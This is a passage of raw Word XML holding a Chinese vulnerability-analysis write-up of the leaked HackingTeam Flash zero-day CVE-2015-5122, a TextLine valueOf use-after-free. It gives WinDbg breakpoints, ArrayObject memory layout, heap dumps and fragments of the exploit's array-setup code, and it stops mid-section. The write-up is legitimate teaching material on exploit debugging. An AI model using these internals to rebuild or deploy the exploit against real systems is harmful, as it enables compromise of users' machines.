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1A" w:rsidRDefault="00DD401A" w:rsidP="00D03DDE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HackingTeam Flash 0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>梅开二度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD401A" w:rsidRDefault="00DD401A" w:rsidP="007C6406">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C6406" w:rsidRDefault="007C6406" w:rsidP="007C6406">
      <w:pPr>
        <w:ind w:firstLine="42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t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>alueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>频出漏洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>adobe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在一直在缺哪补哪，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号才修复了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hackingteam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆出来的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0day CVE-2015-5119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，紧接着</w:t>
      </w:r>
      <w:r w:rsidR="00A05433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="00A05433">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又被人从泄露的邮件中挖掘出另一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，又是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的问题。这次这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TextLine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>造成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Fireeye</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经提交了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>adobe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并领取了</w:t>
      </w:r>
      <w:r w:rsidRPr="00715226">
        <w:t>CVE-2015-5122</w:t>
      </w:r>
      <w:r w:rsidRPr="00715226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00715226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Adobe</w:t>
      </w:r>
      <w:r w:rsidRPr="00715226">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也发布了安全公告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD1CBB" w:rsidRDefault="007057EB" w:rsidP="007C6406">
      <w:pPr>
        <w:ind w:firstLine="42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hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="007C6406" w:rsidRPr="00236AE1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>https://helpx.adobe.com/security/products/flash-player/apsa15-04.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007C6406" w:rsidRDefault="00715226" w:rsidP="007C6406">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一直本着有人分析过的漏洞不在专门写文章来描述，有点重复工作的感觉。不过刚好</w:t>
      </w:r>
      <w:r w:rsidR="007A53BF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有点想法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过这个文章详细介绍下调试流程</w:t>
      </w:r>
      <w:r w:rsidR="00642F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidR="00642F25">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，帮助一些朋友们后续更好的学习。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00372846" w:rsidRDefault="00372846" w:rsidP="00372846"/>
    <w:p w:rsidR="00331035" w:rsidRPr="00331035" w:rsidRDefault="00331035" w:rsidP="00372846"/>
    <w:p w:rsidR="00B46699" w:rsidRDefault="005A5673" w:rsidP="00901DE7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>茫茫</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JIT CODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如何找到我们想要跟踪的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有很多方法，具体可以参见附录</w:t>
      </w:r>
      <w:r w:rsidR="00380A0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">debug </w:t>
      </w:r>
      <w:r w:rsidR="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jitcode</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这里通过先找到</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>array</w:t>
      </w:r>
      <w:r w:rsidR="00901DE7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的函数创建以及数据结构，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取设置值对应的实现函数</w:t>
      </w:r>
      <w:r w:rsidR="00B46699">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5673" w:rsidRDefault="00B46699" w:rsidP="00901DE7">
      <w:pPr>
        <w:ind w:right="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来跟踪整个</w:t>
      </w:r>
      <w:r w:rsidR="00E913B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">EXP </w:t>
      </w:r>
      <w:r w:rsidR="00E913B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">JIT CODE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流程</w:t>
      </w:r>
      <w:r w:rsidR="00C30050">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(PS:</w:t>
      </w:r>
      <w:r w:rsidR="00C30050">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么找到的？根据附录里面的方法</w:t>
      </w:r>
      <w:r w:rsidR="00C30050">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5673" w:rsidRDefault="005A5673" w:rsidP="00372846">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD1D2C" w:rsidRPr="001051EB" w:rsidRDefault="00CD1D2C" w:rsidP="00372846"/>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARRAY Struct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+0x10   m_buffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+0x18   m_pos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+0x1c   m_cab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC"/>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="004445BC">
      <w:r>
        <w:t>m_buffer + 8 + m_pos*4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004445BC" w:rsidRDefault="004445BC" w:rsidP="00372846"/>
    <w:p w:rsidR="004445BC" w:rsidRPr="004445BC" w:rsidRDefault="00CD1D2C" w:rsidP="00372846">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Array </w:t>
      </w:r>
      <w:r w:rsidR="00AD7E56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Method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 xml:space="preserve">18.0.0.203.ocx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46699" w:rsidRDefault="00B46699" w:rsidP="00372846">
      <w:r w:rsidRPr="00B46699">
        <w:t>106B54D0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00B46699">
        <w:t>ArrayObject::_setUintProperty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46699" w:rsidRDefault="00B46699" w:rsidP="00372846">
      <w:r w:rsidRPr="00B46699">
        <w:t xml:space="preserve">106AECB0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  ArrayObject:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B46699">
        <w:t>create_array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46699" w:rsidRDefault="00B46699" w:rsidP="00372846">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00982F61" w:rsidRDefault="00982F61" w:rsidP="00372846">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过设置如下断点来跟踪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5673" w:rsidRDefault="00B46699" w:rsidP="00372846">
      <w:r w:rsidRPr="00B46699">
        <w:t>bu Flash32_18_0_0_203!IAEModule_IAEKernel_UnloadModule+0x19b9c0 ".echo set array value;dd esp"</w:t>
      </w:r>
      <w:r w:rsidR="005A567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B46699">
        <w:t>avmplus::ListImpl</w:t>
      </w:r>
      <w:r w:rsidR="002E4651">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  //</w:t>
      </w:r>
      <w:r w:rsidR="002E4651" w:rsidRPr="002E4651">
        <w:t xml:space="preserve"> 10662080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0F2F" w:rsidRDefault="00FE0F2F" w:rsidP="00372846">
      <w:r w:rsidRPr="00FE0F2F">
        <w:t>bu Flash32_18_0_0_203!IAEModule_IAEKernel_UnloadModule+0x19b860 "set array value by obj"</w:t>
      </w:r>
      <w:r w:rsidR="00C84F22">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidR="00C84F22" w:rsidRPr="00C84F22">
        <w:t xml:space="preserve"> 10661F20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5673" w:rsidRDefault="00C77C57" w:rsidP="00372846">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bu </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77C57">
        <w:t>Flash32_18_0_0_203!IAEModule_IAEKernel_UnloadModule+0x1e85f0 ".echo createarray"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00FE0F2F" w:rsidP="00372846">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">bu </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0F2F">
        <w:t>avmplus::ArrayObject::_setUintProperty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0F2F" w:rsidRDefault="00FE0F2F" w:rsidP="00372846"/>
    <w:p w:rsidR="00CD3B64" w:rsidRDefault="00CB69A0" w:rsidP="00372846">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面在真正</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB69A0">
        <w:t>TryExpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有个</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC" w:rsidRPr="007F7DBC">
        <w:t>Check64</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，这里不详细讲述，原理跟</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TryExpl</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样主要是用来做探路先小触发下漏洞获取当前是</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位还是</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="007F7DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位进程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A5673" w:rsidRDefault="00CD3B64" w:rsidP="00372846">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB69A0">
        <w:t>TryExpl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前</w:t>
      </w:r>
      <w:r w:rsidR="00CB69A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有几次分配</w:t>
      </w:r>
      <w:r w:rsidR="00CB69A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">array </w:t>
      </w:r>
      <w:r w:rsidR="00CB69A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接忽略</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以根据</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TryExpl</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度为</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x7E</w:t>
      </w:r>
      <w:r w:rsidR="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来识别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00496391" w:rsidRDefault="00496391" w:rsidP="00372846"/>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00F35223">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>In TryExpl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00F35223" w:rsidP="00F35223">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1 ArrayCreate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>_arLen1 = 10 * 3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0x1e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>_arLen2 = _arLen1 + 4 * 4;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//0x2e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>_arLen = _arLen2 + 10 * 8;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//0x7e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00AD1D34">
      <w:pPr>
        <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
      </w:pPr>
      <w:r>
        <w:t>_ar = new Array(_arLen);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//0x7E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="0084321B" w:rsidP="00C77C57">
      <w:r w:rsidRPr="00C77C57">
        <w:t>Createarray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ArrayObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>0:008&gt; dd eax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77C57">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ArrayObject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345220  08204ec8 8000bf01 08e65100 093450a0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">09345230  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F35223">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">0993c1a8 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">00000000 00000000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77C57">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>00000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F35223" w:rsidRDefault="00F35223" w:rsidP="00C77C57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F35223">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>m_buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00686D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00686D36" w:rsidRPr="00253567">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>m_pos</w:t>
      </w:r>
      <w:r w:rsidR="00686D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00380824">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>capacity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345240  00000000 00000001 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345250  081f2e90 00000004 093df5b0 092bf430</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345260  093bbd18 07b8f0f0 08e1e250 08e1e238</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345270  08e1bf28 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345280  09300520 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57">
      <w:r>
        <w:t>09345290  00000000 00000000 00000000 00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="00C77C57" w:rsidP="00C77C57"/>
    <w:p w:rsidR="00C77C57" w:rsidRDefault="0063750F" w:rsidP="0063750F">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2 Fill Array</w:t>
      </w:r>
      <w:r w:rsidR="001F6342">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00016053">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">memory </w:t>
      </w:r>
      <w:r w:rsidR="001F6342">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
